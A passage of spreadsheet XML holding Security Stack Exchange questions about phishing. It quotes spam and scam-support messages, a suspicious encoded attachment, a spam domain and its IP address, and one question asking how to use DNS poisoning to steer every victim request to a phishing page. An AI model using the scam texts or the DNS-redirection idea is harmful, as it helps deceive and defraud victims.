 &lt;/blockquote&gt;
 &lt;p&gt;But I am able to browse in my browser, which means that I have Internet connection.&lt;/p&gt;
 &lt;p&gt;Does that mean that the site is secured against "Phishing attack" or is there a problem with my approach?? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;kali-linux&gt;</t>
  </si>
  <si>
    <t>Email phishing, understand mail header</t>
  </si>
  <si>
    <t>&lt;p&gt;I try to understand phishing email received from an attacker:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Received: ....
 Received: ....
 Received-SPF: Pass (sender SPF authorized) identity=mailfrom; client-ip=; helo= envelope-from:attacker@infected_website.com;receiver=victim@legit_site.com
 Received: from mout.gmx.com ( [])
  by (Postfix) with ESMTPS id =
  for &amp;lt;victim@legit_site.com&amp;gt;; Mon, 10 Feb 2019 13:06:35 +0100 (CET)
 Received: from [IP_SRC] ([IP_SRC]) by
  .... (via HTTP); Mon, 10 Feb 2019 13:06:33 +0100
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>Google Sheet with macro opened on Android phone. Will the macro run?</t>
  </si>
  <si>
    <t>&lt;p&gt;I accidentally opened up a spam mail containing a google drive sheet with a macro on my Galaxy S8 phone. The spam email goes something like:&lt;/p&gt;
 &lt;hr /&gt;
 &lt;p&gt;Headline: &amp;quot;Need action! Withdrawing Funds id - (some ID number)&amp;quot;&lt;/p&gt;
 &lt;p&gt;Body: &amp;quot;you got 6 hours to withdraw BTC from your account. All information attached in the link.&amp;quot;&lt;/p&gt;
 &lt;p&gt;And then it contained a link to the spreadsheet. The author &amp;quot;tagged&amp;quot; me and some other people in a comment on the file like &amp;quot;@abc@mail.com&amp;quot;.&lt;/p&gt;
 &lt;hr /&gt;
 &lt;p&gt;The reason I accidentally opened the file was due to the fact that a &amp;quot;drive&amp;quot; notification popped up on my Galaxy S8 phone. I instantly realized what happened when it opened and quickly closed the app, reset my password for my gmail and logged out of a few things on my phone. I also (reported the sheet as malware to Google) and then panic deleted the sheet file that was now on my drive (and said &amp;quot;opened by you today at 6:00&amp;quot;).&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;I am panicking because I am not tech-savvy and I don't know what to do.&lt;/strong&gt; I have a few questions:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;Do Google Drive macros work on an Android phone?&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;What are the right steps in order to prevent identity theft or anything else? I am willing to go far to protect myself.&lt;/p&gt;
 &lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;I did not open the spreadsheet on my PC, but I reported it and deleted it from my PC. Sadly, I deleted everything including the corresponding spam email, so I don't have much for you to go on, other than it looked like a typical spam email and was reported as spam by Gmail (&lt;em&gt;I've gotten a similar spam email looking exactly like the one I opened&lt;/em&gt;).&lt;/p&gt;
 &lt;p&gt;The email looked very similar to this one in the picture below.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/JZmV6.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/JZmV6.jpg" alt="similaremail" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;My hypothesis is that the macro in the spreadsheet is either a phishing attempt on stealing your cryptowallet details or something in regards to cryptocurrency. However, I am scared that it might be able to steal other things from my Phone (Notes, pictures, &amp;quot;password cookies&amp;quot; from apps like Dropbox?).&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;macro&gt;</t>
  </si>
  <si>
    <t>Was GMail hacked?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was logging in to my gmail and this phising alert screen showed. Is safe to continue? I know that is very rare that this shows when opening GMail, but I prefer to be safe.&lt;/p&gt;
 &lt;p&gt;It seems that this appeared in the screen that asks me to enter again the password &lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/maVVd.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/maVVd.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>Should a bank/financial service use external URL shortener services?</t>
  </si>
  <si>
    <t>&lt;p&gt;Say there is a bank/financial service that wants to have hyperlinks on their secure website/domain (or even in emails they send out to customers). In some of these links there are some long/obscure URLs which link to one of their subdomains, but the long links are ugly and not very user friendly, so they want to have shorter, nicer links to put on the website or email.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;What are the risks for a bank/financial service using an external URL shortener service, e.g. Bitly, for this?&lt;/li&gt;
 &lt;li&gt;Is it better for a bank/financial service to host this sort of short link to long link translation service on their own domain and infrastructure?&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;man-in-the-middle&gt;&lt;phishing&gt;&lt;url&gt;</t>
  </si>
  <si>
    <t>Can a local root certificate make a user more susceptible to phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;In order to scan encrypted network traffic, security software usually installs root certificates on the user's machine. Sometimes on websites with standard digital certificates, the local installed root certificate is shown instead of the actual one. &lt;/p&gt;
 &lt;p&gt;I have for a while been a bit weary of this, not for snooping reasons, but for phishing reasons. The &lt;a href="https://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html" rel="nofollow noreferrer"&gt;Punycode&lt;/a&gt; PoC phishing site contains a digital certificate, and with other phishing sites being issued certificates too (&lt;a href="https://www.bleepingcomputer.com/news/security/14-766-lets-encrypt-ssl-certificates-issued-to-paypal-phishing-sites/" rel="nofollow noreferrer"&gt;source&lt;/a&gt;), it is possible that checking the certificate on a suspeted site might just reveal a the local root certificate of the security software. &lt;/p&gt;
 &lt;p&gt;This makes me wonder whether this raises security concerns, as I normally check the digital certificate on pages where I am sending sensitive data to check that everything is ok. If however I am given a local root certificate, I don't have the same degree of certainty.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;So essentially how can you know whether a personal root certificate is trusting a genuine site with a digital certificate, or just any site with a digital certificate?&lt;/strong&gt; &lt;/p&gt;</t>
  </si>
  <si>
    <t>Databases with spam, phishing email examples</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm working on a little project trying to see if I can predict the likelihood that an email is in fact a security risk (phishing, spam, social engineering, etc). &lt;/p&gt;
 &lt;p&gt;I order to do this I need to have a lis of examples I could use to understand "spam", "phishing" or "social engineer" language. &lt;/p&gt;
 &lt;p&gt;I'm planning to focus on english language emails. &lt;/p&gt;
 &lt;p&gt;Are there any databases that contain examples of:
 &lt;br&gt; - spam email (my spam box is very mixed, and I might have some valid emails in there. 
 &lt;br&gt; - phishing emails (or spear phishing)
 &lt;br&gt; - emails marked as social engineering attacks. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;spam&gt;&lt;phishing&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>Can a text file disguised as .xlsm be malicious?</t>
  </si>
  <si>
    <t>&lt;p&gt;A hour ago we receive a suspicious mail targeting some of our mailing lists. It contains a .zip file, itself containing a .xlsm file.&lt;/p&gt;
 &lt;p&gt;This .xlsm file appears to be recognized as an ASCII text file from the file utility and olevba:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;olevba 0.56.1.dev2 on Python 2.7.16 - http://decalage.info/python/oletools
 ===============================================================================
 FILE: ./Document23312_backup.xlsm
 Type: Text
 -------------------------------------------------------------------------------
 VBA MACRO ./Document23312_backup.xlsm
 in file: ./Document23312_backup.xlsm - OLE stream: ''
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
 ### BEGINNING FILE CONTENT ###
 HupKasOthobiarHofrigNioggEgDabHeegantyeeg3quadWozUdAirgiankejrickUphPikUsedbedTaryoofog/
 CatsidcerOdiberboipmoawgoojurr8GlerfEurryasOpchynghoojyovshobtoonshAnsIdair&amp;amp;quadbyxEigufOvCiatvocsho
 OovChorOseskajnitdyodkeapApcoHacKubFoondamUbwicveljOvJenrocsyapdivomret7OnsOcbucUj,
 `ovWedEijopEydFalquehobisib_DakVuktadAdFuNucPhooz2
 JaFrarn2ocDoojNowdyasofJighfalhumVeitMuAnriHeptowpEzSaFru4ghipGhowuvViVophOwd:Okijhuf
 )OtyijwushouritoagceyfuojbiocIkajbacodoc8
 ### END FILE CONTENT ###
 No suspicious keyword or IOC found.
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;As we does not have sandboxes, we did not open the document with Microsoft Excel.&lt;/p&gt;
 &lt;p&gt;We're surprised by these three factors:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;file is sent using spearphising&lt;/li&gt;
 &lt;li&gt;file pretends to be a .xlsm document, but is an ASCII text file&lt;/li&gt;
 &lt;li&gt;file content looks encrypted or encoded&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;We're not IT experts so we're distraught about this file. Could it be a virus, or part of it? What could be its motivations? If it's a stagger, is there any way to identify IPs from which it'd load payloads?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;phishing&gt;&lt;office&gt;&lt;excel&gt;</t>
  </si>
  <si>
    <t>Beaming Mel-Bin</t>
  </si>
  <si>
    <t>Technical security issues with proactively executing a phishing campaign targeting your own users</t>
  </si>
  <si>
    <t>&lt;p&gt;We've had some issues with compromised accounts due to users falling victim to phishing campaigns.&lt;/p&gt;
 &lt;p&gt;The possibility of us doing a phishing campaign against our own users to proactively shame them has come up.&lt;/p&gt;
 &lt;p&gt;Putting aside my personal issues with this, I have some security-related problems:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;If we use an outside account as the source of the campaign:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Account could be locked by the outside provider---and rightfully so. We will never see the replies anyway.&lt;/li&gt;
 &lt;li&gt;Replies will be transported via external servers. These replies may contain credentials.&lt;/li&gt;
 &lt;/ul&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;If we use an internal account as the source:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Some users use external SMTP (they shouldn't, but some do). Therefore, still the chance that the reply is transported via a server we do not manage.&lt;/li&gt;
 &lt;li&gt;It will make the message look "more legitimate" since it originates from our domain. Maybe not a fair test?&lt;/li&gt;
 &lt;/ul&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;&lt;strong&gt;My question:&lt;/strong&gt; Has anyone done this? How did you overcome the technical issues? Any issues you didn't foresee? I am hoping to convince management that this is &lt;em&gt;not&lt;/em&gt; a smart thing to do but I want to be prepared just in case.&lt;/p&gt;</t>
  </si>
  <si>
    <t>How safe is it to provide my administrator account password for a 3rd party software: EasyUS Todo Backup?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've been recently searching for a backup solution for my Windows desktop. That's when I came across this free software called &lt;a href="http://www.todo-backup.com/download/" rel="nofollow noreferrer"&gt;EasyUS Todo Backup&lt;/a&gt;. (I know it's a mouthful but English doesn't seem to be their first language.) So I downloaded a copy and tried it in my VM before deploying it on the actual computer.&lt;/p&gt;
 &lt;p&gt;What immediately struck me was that the software &lt;strong&gt;required&lt;/strong&gt; me to provide my Windows administrator account password when I was scheduling the backup. I was faced with the following screen and the error message if I failed to enter my admin credentials:&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/leV5e.png" alt="enter image description here"&gt;&lt;/p&gt;
 &lt;p&gt;So I'm curious, from a security standpoint, how safe is it to provide these credentials to a third party software like this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;authentication&gt;&lt;windows&gt;&lt;password-management&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Detecting malicious domains/URLs</t>
  </si>
  <si>
    <t>&lt;p&gt;Do state of the art commercial URL threat intelligence feeds ( for example, one's by Symantec, Intel-security etc) miss malicious domains? (i.e. domains serving malware,exploit code &amp;amp; phishing domains - to make the discussion specific.) If so, why? What are the technical challenges people are facing in solving this problem? 
 I understand that there are many methods people use to do detection including a combination of machine learning, capturing data with honeypots,etc behind the scenes to generate such feeds. 
 I want to specifically understand what technical obstacles limit the effectiveness of these methods and why they miss what they miss. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;ids&gt;&lt;detection&gt;</t>
  </si>
  <si>
    <t>My old iPad 2 has a persistent email virus "Virus Detected" that pops up whenever I attempt to use Safari</t>
  </si>
  <si>
    <t>&lt;p&gt;I've attempted to delete the email, change the email and to close Safari but the email keeps returning and makes using the browser impossible. I have no intention of either calling the provided phone number or sending this email as it directs me to do. The email is as follows:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Email addressed to: foo@example.com&lt;/p&gt;
 &lt;p&gt;Subject: Warning! Virus Detected! Immediately Call Apple Support +1-800-876-6855. Your credit card details and banking information.Your e-mail passwords and other account passwords.Your Facebook, Skype, AIM, ICQ and other.Call Apple Support +1-800-876-6855. Your private photos, family photos and other sensitive files.Your webcam could be accessed remotely by stalkers with a VPN virus.&lt;/p&gt;
 &lt;p&gt;message &amp;quot;Apple Tech Support !cc=bar@example.com&amp;quot;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;How do I remove this ..... email, regain access to my browser and irradiate this virus from my iPad 2 which can no longer receive operating system and virus updates. This virus is not present on my new iPad Air 2, which I'm using to send this inquiry.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;virus&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How do fake emailers work?</t>
  </si>
  <si>
    <t>&lt;p&gt;Our University recently had a case where some notorious fellows used a &lt;a href="http://emkei.cz/" rel="nofollow"&gt;fake emailing service&lt;/a&gt; to send an email to all students on behalf of the administration. Although most good email services (like Gmail?) can warn us that the mail is likely a &lt;em&gt;phishing&lt;/em&gt; attempt, many users not educated in security may fall in this trap.&lt;/p&gt;
 &lt;p&gt;My understanding of emails (I am no pro, so pardon me if there are flaws) was that if I need to use something like Telnet to send fake emails with a local email service (on LAN), it would be anyways possible, but I would need to enabling some kind of 'relay' to be able to do so for services like Gmail. &lt;/p&gt;
 &lt;p&gt;My question here: how is this fake emailer (or any other) doing this? I am not looking for theory on email. Maybe some security guys could have a look at the page's source and give clearer details. &lt;/p&gt;</t>
  </si>
  <si>
    <t>Can phishing site URL shorten into numbers?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;img src="https://i.stack.imgur.com/KFxOB.jpg" alt="enter image description here"&gt;&lt;/p&gt;
 &lt;p&gt;A suspected hacker was trying to get the user to input those numbers (2412958) in their address book. And user knows that the numbers are weird.&lt;/p&gt;
 &lt;p&gt;Can URLs be shortened in texts like that? &lt;/p&gt;</t>
  </si>
  <si>
    <t>End user composes email linking to external domain: Best practices?</t>
  </si>
  <si>
    <t>&lt;p&gt;2 questions:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;What are the arguments &lt;em&gt;against&lt;/em&gt; warning end users that compose emails linking to external, non white listed domains?&lt;/li&gt;
 &lt;li&gt;Are there available tools, including handling of necessary dialogues with users, that intercepts e-mails as described below?&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;In the function as a corporate employee, I recently received an e-mail requesting me to fill out an online survey. An external tool was used, so that both the sender's e-mail address and the link to the survey was on an external domain. There was no link to an authoritative, internal site where this external site was white listed.&lt;/p&gt;
 &lt;p&gt;I assume you agree that this is not OK&lt;sup&gt;(1)&lt;/sup&gt;. Logically it would follow that one would train users not to compose such emails, as that will lower colleagues' vigilance. But when I bring this issue up with my managers, they respond "it's OK to click this link", no further action taken.&lt;/p&gt;
 &lt;p&gt;Would a solution here be to introduce, at the corporate level, a filter of sorts that:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Monitor incoming e-mail that contains external links that are from non-white listed domains.&lt;/li&gt;
 &lt;li&gt;Infer (from name or otherwise) if the sender seems to identify as an internal.&lt;/li&gt;
 &lt;li&gt;Halt or append the e-mail (remove links, supply warning including 1) best practices and 2) list out the removed links in a way that require manual work in order to execute them, e.g. inserting square brackets around the TLD or similar).
 &lt;ul&gt;
 &lt;li&gt;Consider also appending e-mails including links to white listed sites, providing confidence and raising awareness.&lt;/li&gt;
 &lt;/ul&gt;&lt;/li&gt;
 &lt;li&gt;Warn the supposed sender about what has happened and again supply advice about best practice.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I would assume this would increase vigilance and make it harder to perform actual attacks, but I have not seen such a safeguard deployed for the clients I have worked for recently, all of which have experience with actual spear phishing attacks. &lt;/p&gt;
 &lt;p&gt;So again, the questions are:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;What are the arguments for not implementing said filter? &lt;/li&gt;
 &lt;li&gt;Does any provider (e.g. &lt;a href="https://www.fireeye.com/products/ex-email-security-products.html" rel="nofollow noreferrer"&gt;Fireeye&lt;/a&gt;) provide such filtering&lt;sup&gt;(2)&lt;/sup&gt; OOTB, preferably supporting an ADFS &amp;amp; Exchange-based infrastructure?&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;sup&gt;(1) Rationale: The e-mail cannot be distinguished from spear phishing; anecdotal evidence &lt;a href="https://security.stackexchange.com/questions/68975/what-is-different-about-being-targeted-by-a-professional-attacker/69001#69001"&gt;suggests&lt;/a&gt; that even IT pros easily succumb to this attack form; spear phishing "[accounts] for 91% of attacks" [&lt;a href="https://en.wikipedia.org/wiki/Phishing#Spear_phishing" rel="nofollow noreferrer"&gt;W&lt;/a&gt;]; mature corporations train their users not to click links to external domains that are not authoritatively white listed internally.&lt;/sup&gt;&lt;/p&gt;
 &lt;p&gt;&lt;sup&gt;(2) The functionality should include 1) reaching out to assumed internal users that, with good intentions, have used external tools to create bulk e-mail, as in the use case described above, and 2) managing an authoritative white list that can be made visible to end users.&lt;/sup&gt;&lt;/p&gt;
 &lt;p&gt;&lt;sup&gt;Note: Question has been rephrased from "Why don't we warn end users that compose emails linking to external domains?".&lt;/sup&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>Site hack with email phishing scam</t>
  </si>
  <si>
    <t>&lt;p&gt;We have a small business website that has been compromised. They are somehow getting customers order details and contacting them requesting their credit card details. We have had our web team and a third party IT company looking into it and we can't find out where the breach is. &lt;/p&gt;
 &lt;p&gt;There seems to be no suspicious access on the database, and none of the website code seems to have been altered.&lt;/p&gt;
 &lt;p&gt;There are also no new admin users and no unexpected logins from existing user profiles in the logs. We have changed all passwords we can think of but they still seem to be able to get the order details. This guy had the same problem back in April (exactly the same, even the same name used Lucy Whetton) but he hasn't posted what the solution was.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://security.stackexchange.com/questions/85999/email-phishing-scam-asking-customers-for-card-details"&gt;Email phishing scam asking customers for card details&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Does anyone have any ideas?&lt;/p&gt;
 &lt;p&gt;By the way, we have and are contacting all customers immediately to tell them not to respond to these phishing emails.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;websites&gt;&lt;email-spoofing&gt;</t>
  </si>
  <si>
    <t>Received an email about an "Etsy" Password Reset due to the "Linkedin Breach...." is this a phishing attempt?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received an email today from Etsy saying they are resetting my password(from the source it looks like a mass reset of all users), due to there being some sort of Linkedin breach, that compromised emails, and passwords. &lt;/p&gt;
 &lt;p&gt;Etsy says they themselves aren't compromised, but apparently you can use a linkedin account to access Etsy.&lt;/p&gt;
 &lt;p&gt;So I'm curious.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;How big of a deal was the Linkedin breach?? I'm assuming everything was protected so that our passwords were not plain text, but I guess it's a matter of time before they are cracked (I'm assuming LinkedIn uses very good security).&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;From what I see they "Invalidated" passwords before 2012... but what about after?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Did Etsy actually do a mass password reset, or is this a spam/phishing email trying to take advantage of what happened with Linkedin, or take advantage of us not knowing that Linkedin was/wasn't compromised?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;If both passwords were reset internally(Linkedin "Invalidated some passwords), is there any reason to reset the passwords if we don't need to use those services? I'm not sure how good their "random passwords" for resetting are, but if they are good enough can we just not change the passwords, or is it ALWAYS a best practice to change the passwords?&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;^ I'm just wondering if there might be greater risk (phishing attempt) if you do try to click those password reset links(since I'm assuming they aren't emailing us our passwords), and that those could be malicious? Again, assuming the fact that you do NOT use those accounts often. If you do use them often, or that we SHOULD reset the passwords again... what steps should we take then? Contact both companies to make sure it was a legit breach and that my email to Etsy was legit?&lt;/p&gt;
 &lt;p&gt;EDIT:&lt;/p&gt;
 &lt;p&gt;another question came to me..&lt;/p&gt;
 &lt;p&gt;Would it be wise for everyone to change their passwords across the board then? If the data has been cracked, then people should change their passwords (for those who were compromised back then, probably already changed their passwords I'm assuming though)?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;email&gt;&lt;system-compromise&gt;</t>
  </si>
  <si>
    <t>Why would a stranger offer to write content for a nonexistent blog?</t>
  </si>
  <si>
    <t>&lt;p&gt;I get emails like this all the time:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Hello dear,
 I‚Äôm a long time reader. I‚Äôm writing to you because I‚Äôd love to contribute a guest post on your website.
 I‚Äôve been brainstorming some topics that I think your readers would get a ton of value from:
 [The Best XXXL Extra Large Electric Heating Pad on Amazon for Full Body]
 I‚Äôll make sure the piece overflows with information that can‚Äôt be found anywhere else. Looking forward to your reply.
 Have a nice day,
 Lekin
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;It's from an ordinary looking hotmail account, and AFAICT contains just this text. There are no links to click, so it's not an ordinary phishing email.&lt;/p&gt;
 &lt;p&gt;If they really thought I'd like to include their content on my blog, if I had one, surely they know a spammy Amazon product name would be a turnoff.&lt;/p&gt;
 &lt;p&gt;So it feels like there's some other agenda here, but I can't figure out what it would be.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;spam&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>Browser is accepting italic/bold Unicode as part of SPAM email's URL</t>
  </si>
  <si>
    <t>&lt;p&gt;This is truly crazy. I received a SPAM email in which there is a URL crafted from apparent Unicode characters that surprisingly exist for italic/bold letters, which when I reported it to Google's spam collector using Thunderbird's Report Spam Email feature it had already been converted to ASCII letters, therefore the URL was not properly reported.&lt;/p&gt;
 &lt;p&gt;Here is the Unicode version:
 &amp;lt;base href=&amp;quot;http://ùô™ùôØùô£ùôôùôßùôöùô®ùô®.COM&amp;quot;&amp;gt;&lt;/p&gt;
 &lt;p&gt;Notice! These characters are bold/italic NOT because I selected to make them so, but because Unicode bizarrely contains bold/italic letters.&lt;/p&gt;
 &lt;p&gt;See the hex values here:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;0011660 e &amp;gt; &amp;lt; / t i t l e &amp;gt; &amp;lt; b a s e sp
  3e65 2f3c 6974 6c74 3e65 623c 7361 2065
  e &amp;gt; &amp;lt; / t i t l e &amp;gt; &amp;lt; b a s e 
 0011700 h r e f = &amp;quot; h t t p : / / p gs em
  7268 6665 223d 7468 7074 2f3a f02f 999d
  h r e f = &amp;quot; h t t p : / / 360 235 231
 0011720 * p gs em / p gs em # p gs em em p gs em
  f0aa 999d f0af 999d f0a3 999d f099 999d
  252 360 235 231 257 360 235 231 243 360 235 231 231 360 235 231
 0011740 ' p gs em sub p gs em ( p gs em ( . C O
  f0a7 999d f09a 999d f0a8 999d 2ea8 4f43
  247 360 235 231 232 360 235 231 250 360 235 231 250 . C O
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Can a URL actually contain these Unicode characters, or will all browsers convert them to ASCII?&lt;/p&gt;
 &lt;p&gt;Whether ASCII or Unicode, ping resolves this to 185.86.76.164.&lt;/p&gt;
 &lt;p&gt;Why do these Unicode characters exist in the first place? Whoever requested bold/italic letters?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;spam&gt;&lt;url&gt;&lt;unicode&gt;</t>
  </si>
  <si>
    <t>SMS: Apple has detected multiple failed login attempts</t>
  </si>
  <si>
    <t>&lt;p&gt;I have just got a SMS message (text message) on my phone saying:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Apple has detected multiple failed login attempts&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Given I don't have (and have never had) an iPhone, I expect it is some sort of scam. However scammers are not well known for using a messaging system that they have to pay for and that is traceable to the sender.&lt;/p&gt;
 &lt;p&gt;So&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Should I report it to anyone (I am in the UK)?&lt;/li&gt;
 &lt;li&gt;How are they getting round the networks being able to trace the phone that sent the SMS message?&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>Dns poisoning for any search</t>
  </si>
  <si>
    <t>&lt;p&gt;DNS poisoning works only if we open a certain website.
 For example, a victim enters 192.168.21.56 in a browser, it will be directed to a phishing page. &lt;/p&gt;
 &lt;p&gt;What if we want to redirect the victim to 192.168.21.56 for anything he enters in the browser? &lt;code&gt;www.example.com&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;He should be redirected to 192.168.21.56&lt;/p&gt;
 &lt;p&gt;Is there a possible way?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;url-redirection&gt;&lt;dns-spoofing&gt;&lt;ettercap&gt;</t>
  </si>
  <si>
    <t>Preventing phishing / spear phishing of employees</t>
  </si>
  <si>
    <t>&lt;p&gt;We get a lot of targeted phishing emails to our employees, semi-sophisticated ones where they speak about a project or give an outline brief. We then get back to them and they send us an 'attached PDF', which is always a link to a phishing site requiring a Google or Dropbox password.&lt;/p&gt;
 &lt;p&gt;We're pretty good at spotting these a mile off, mainly because the fake Google or Dropbox site is crap using pixelated images / graphics, odd spelling etc. (Why they don't just go to Dropbox.com and copy the HTML source is beyond me, but that's their loss.) My fear is that we are getting more and more of these emails and eventually one of them will probably get past us. We also get a lot of spear phishing emails (where the spammer spoofs our domain in the sent field) but luckily we use Google Apps for business email which seems to have a 100% track record of filtering these straight to spam.&lt;/p&gt;
 &lt;p&gt;To combat it I've got the following in place : &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;unique passwords for all sites, using 1password&lt;/li&gt;
 &lt;li&gt;2 factor auth for sites that allow it&lt;/li&gt;
 &lt;li&gt;Avast anti-virus web extension that blocks some phishing / malware sites (but it doesn't always have every site listed; probably only about 25% of the sites I've come across it picks up)&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Things I'm thinking of implementing : &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;OpenDNS on office router (to create another layer of filtration similar to Avast above, as I believe OpenDNS has an automatic phishing / malware blacklist. Only downside with OpenDNS is it only would cover onsite employees unless it was manually installed as the primary DNS on each device.)&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Is there anything else I should be looking at implementing to prevent these attacks ?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;dns&gt;&lt;phishing&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>New trend? Recognizable and specific subject in Spam / malware mails</t>
  </si>
  <si>
    <t>&lt;p&gt;It seems that a new trend has emerged in the past few weeks. While users are (meanwhile) aware that an unexpected mail with subject &amp;quot;Your invoice&amp;quot; or &amp;quot;Your delivery&amp;quot; is suspicious, it seems that nowadays such attempts more often (in fact, according to my observations: massively) use &lt;em&gt;specific&lt;/em&gt; subject lines that match some mail conversations of the past (e.g., &amp;quot;Re: Suggested changes to sales contract Samplestreet&amp;quot; when contract negotiations about estate in Samplestreet really were a thing the attacked recipient was involved with). Of course, such a subject line gives the recipient a false sense of trust and may make them open malicious attachments.&lt;/p&gt;
 &lt;p&gt;Apparently, some machine was infected where the malware harvested subject-recipient pairs (and as of now, I doubt that it happened &lt;em&gt;here&lt;/em&gt;).&lt;/p&gt;
 &lt;p&gt;Apart from telling my users in general to be even more cautious than usual, what are suitable measures against this form of attack? (To begin with: Does it have a specific name that helps me find information about it? While being more specific than phishing, this is still less specific than spear phishing, I guess)&lt;/p&gt;
 &lt;p&gt;Practically the only thing that comes to my mind is to inform all external parties involved (in the Samplestreet deal, say) that they &lt;em&gt;may&lt;/em&gt; have been infected. And also warn involved &lt;em&gt;internal&lt;/em&gt; users that they may receive more such attacks in this matter in their department.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;social-engineering&gt;&lt;email-attachments&gt;</t>
  </si>
  <si>
    <t>Is this phishing or the real PayPal?</t>
  </si>
  <si>
    <t>&lt;p&gt;This has all traits of phishing, apart from the extended validation SSL cert. Is this site run by the real PayPal?&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/7C6Un.png" alt="enter image description here"&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>The impact of the Sony attacks on the security industry</t>
  </si>
  <si>
